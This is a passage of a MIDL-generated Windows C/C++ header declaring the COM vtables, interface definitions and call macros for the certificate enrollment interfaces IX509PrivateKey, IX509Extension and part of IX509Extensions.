        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PrivateKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PrivateKey * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Open )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Create )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Close )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Delete )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *Verify )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyVerify VerifyType);
        
        HRESULT ( STDMETHODCALLTYPE *Import )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *Export )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR strExportType,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncodedKey);
        
        HRESULT ( STDMETHODCALLTYPE *ExportPublicKey )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ContainerNamePrefix )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReaderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ReaderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatus )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspStatus )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt ICspStatus *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProviderType )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509ProviderType *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ProviderType )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509ProviderType Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_LegacyCsp )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_LegacyCsp )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Algorithm )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Algorithm )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeySpec )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509KeySpec Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Length )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ LONG Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ExportPolicy )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyExportFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ExportPolicy )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyExportFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyUsage )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyUsageFlags *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyUsage )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyUsageFlags Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyProtection )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out X509PrivateKeyProtection *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyProtection )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ X509PrivateKeyProtection Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_MachineContext )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_MachineContext )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SecurityDescriptor )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509PrivateKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Certificate )( 
            __RPC__in IX509PrivateKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UniqueContainerName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Opened )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DefaultContainer )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Existing )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Existing )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Pin )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FriendlyName )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Description )( 
            __RPC__in IX509PrivateKey * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Description )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in BSTR Value);
        
        END_INTERFACE
    } IX509PrivateKeyVtbl;

    interface IX509PrivateKey
    {
        CONST_VTBL struct IX509PrivateKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PrivateKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PrivateKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PrivateKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PrivateKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PrivateKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PrivateKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PrivateKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PrivateKey_Open(This)	\
    ( (This)->lpVtbl -> Open(This) ) 

#define IX509PrivateKey_Create(This)	\
    ( (This)->lpVtbl -> Create(This) ) 

#define IX509PrivateKey_Close(This)	\
    ( (This)->lpVtbl -> Close(This) ) 

#define IX509PrivateKey_Delete(This)	\
    ( (This)->lpVtbl -> Delete(This) ) 

#define IX509PrivateKey_Verify(This,VerifyType)	\
    ( (This)->lpVtbl -> Verify(This,VerifyType) ) 

#define IX509PrivateKey_Import(This,strExportType,strEncodedKey,Encoding)	\
    ( (This)->lpVtbl -> Import(This,strExportType,strEncodedKey,Encoding) ) 

#define IX509PrivateKey_Export(This,strExportType,Encoding,pstrEncodedKey)	\
    ( (This)->lpVtbl -> Export(This,strExportType,Encoding,pstrEncodedKey) ) 

#define IX509PrivateKey_ExportPublicKey(This,ppPublicKey)	\
    ( (This)->lpVtbl -> ExportPublicKey(This,ppPublicKey) ) 

#define IX509PrivateKey_get_ContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerName(This,pValue) ) 

#define IX509PrivateKey_put_ContainerName(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerName(This,Value) ) 

#define IX509PrivateKey_get_ContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_ContainerNamePrefix(This,pValue) ) 

#define IX509PrivateKey_put_ContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_ContainerNamePrefix(This,Value) ) 

#define IX509PrivateKey_get_ReaderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ReaderName(This,pValue) ) 

#define IX509PrivateKey_put_ReaderName(This,Value)	\
    ( (This)->lpVtbl -> put_ReaderName(This,Value) ) 

#define IX509PrivateKey_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509PrivateKey_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509PrivateKey_get_CspStatus(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatus(This,ppValue) ) 

#define IX509PrivateKey_put_CspStatus(This,pValue)	\
    ( (This)->lpVtbl -> put_CspStatus(This,pValue) ) 

#define IX509PrivateKey_get_ProviderName(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderName(This,pValue) ) 

#define IX509PrivateKey_put_ProviderName(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderName(This,Value) ) 

#define IX509PrivateKey_get_ProviderType(This,pValue)	\
    ( (This)->lpVtbl -> get_ProviderType(This,pValue) ) 

#define IX509PrivateKey_put_ProviderType(This,Value)	\
    ( (This)->lpVtbl -> put_ProviderType(This,Value) ) 

#define IX509PrivateKey_get_LegacyCsp(This,pValue)	\
    ( (This)->lpVtbl -> get_LegacyCsp(This,pValue) ) 

#define IX509PrivateKey_put_LegacyCsp(This,Value)	\
    ( (This)->lpVtbl -> put_LegacyCsp(This,Value) ) 

#define IX509PrivateKey_get_Algorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_Algorithm(This,ppValue) ) 

#define IX509PrivateKey_put_Algorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_Algorithm(This,pValue) ) 

#define IX509PrivateKey_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define IX509PrivateKey_put_KeySpec(This,Value)	\
    ( (This)->lpVtbl -> put_KeySpec(This,Value) ) 

#define IX509PrivateKey_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509PrivateKey_put_Length(This,Value)	\
    ( (This)->lpVtbl -> put_Length(This,Value) ) 

#define IX509PrivateKey_get_ExportPolicy(This,pValue)	\
    ( (This)->lpVtbl -> get_ExportPolicy(This,pValue) ) 

#define IX509PrivateKey_put_ExportPolicy(This,Value)	\
    ( (This)->lpVtbl -> put_ExportPolicy(This,Value) ) 

#define IX509PrivateKey_get_KeyUsage(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyUsage(This,pValue) ) 

#define IX509PrivateKey_put_KeyUsage(This,Value)	\
    ( (This)->lpVtbl -> put_KeyUsage(This,Value) ) 

#define IX509PrivateKey_get_KeyProtection(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyProtection(This,pValue) ) 

#define IX509PrivateKey_put_KeyProtection(This,Value)	\
    ( (This)->lpVtbl -> put_KeyProtection(This,Value) ) 

#define IX509PrivateKey_get_MachineContext(This,pValue)	\
    ( (This)->lpVtbl -> get_MachineContext(This,pValue) ) 

#define IX509PrivateKey_put_MachineContext(This,Value)	\
    ( (This)->lpVtbl -> put_MachineContext(This,Value) ) 

#define IX509PrivateKey_get_SecurityDescriptor(This,pValue)	\
    ( (This)->lpVtbl -> get_SecurityDescriptor(This,pValue) ) 

#define IX509PrivateKey_put_SecurityDescriptor(This,Value)	\
    ( (This)->lpVtbl -> put_SecurityDescriptor(This,Value) ) 

#define IX509PrivateKey_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509PrivateKey_put_Certificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_Certificate(This,Encoding,Value) ) 

#define IX509PrivateKey_get_UniqueContainerName(This,pValue)	\
    ( (This)->lpVtbl -> get_UniqueContainerName(This,pValue) ) 

#define IX509PrivateKey_get_Opened(This,pValue)	\
    ( (This)->lpVtbl -> get_Opened(This,pValue) ) 

#define IX509PrivateKey_get_DefaultContainer(This,pValue)	\
    ( (This)->lpVtbl -> get_DefaultContainer(This,pValue) ) 

#define IX509PrivateKey_get_Existing(This,pValue)	\
    ( (This)->lpVtbl -> get_Existing(This,pValue) ) 

#define IX509PrivateKey_put_Existing(This,Value)	\
    ( (This)->lpVtbl -> put_Existing(This,Value) ) 

#define IX509PrivateKey_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509PrivateKey_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509PrivateKey_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509PrivateKey_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509PrivateKey_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509PrivateKey_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509PrivateKey_put_Pin(This,Value)	\
    ( (This)->lpVtbl -> put_Pin(This,Value) ) 

#define IX509PrivateKey_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#define IX509PrivateKey_put_FriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_FriendlyName(This,Value) ) 

#define IX509PrivateKey_get_Description(This,pValue)	\
    ( (This)->lpVtbl -> get_Description(This,pValue) ) 

#define IX509PrivateKey_put_Description(This,Value)	\
    ( (This)->lpVtbl -> put_Description(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PrivateKey_INTERFACE_DEFINED__ */


#ifndef __IX509Extension_INTERFACE_DEFINED__
#define __IX509Extension_INTERFACE_DEFINED__

/* interface IX509Extension */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Extension;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30d-217d-11da-b2a4-000e7bbb2b09")
    IX509Extension : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Critical( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Critical( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Extension * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Extension * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Extension * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Extension * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Extension * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Extension * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509Extension * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509Extension * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509Extension * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509Extension * This,
            /* [in] */ VARIANT_BOOL Value);
        
        END_INTERFACE
    } IX509ExtensionVtbl;

    interface IX509Extension
    {
        CONST_VTBL struct IX509ExtensionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Extension_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Extension_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Extension_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Extension_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Extension_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Extension_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Extension_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Extension_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509Extension_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509Extension_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509Extension_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509Extension_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Extension_INTERFACE_DEFINED__ */


#ifndef __IX509Extensions_INTERFACE_DEFINED__
#define __IX509Extensions_INTERFACE_DEFINED__

/* interface IX509Extensions */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Extensions;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30e-217d-11da-b2a4-000e7bbb2b09")
    IX509Extensions : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extension **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509Extension *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IndexByObjectId( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [retval][out] */ __RPC__out LONG *pIndex) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt IX509Extensions *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Extensions * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Extensions * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Extensions * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Extensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Extensions * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
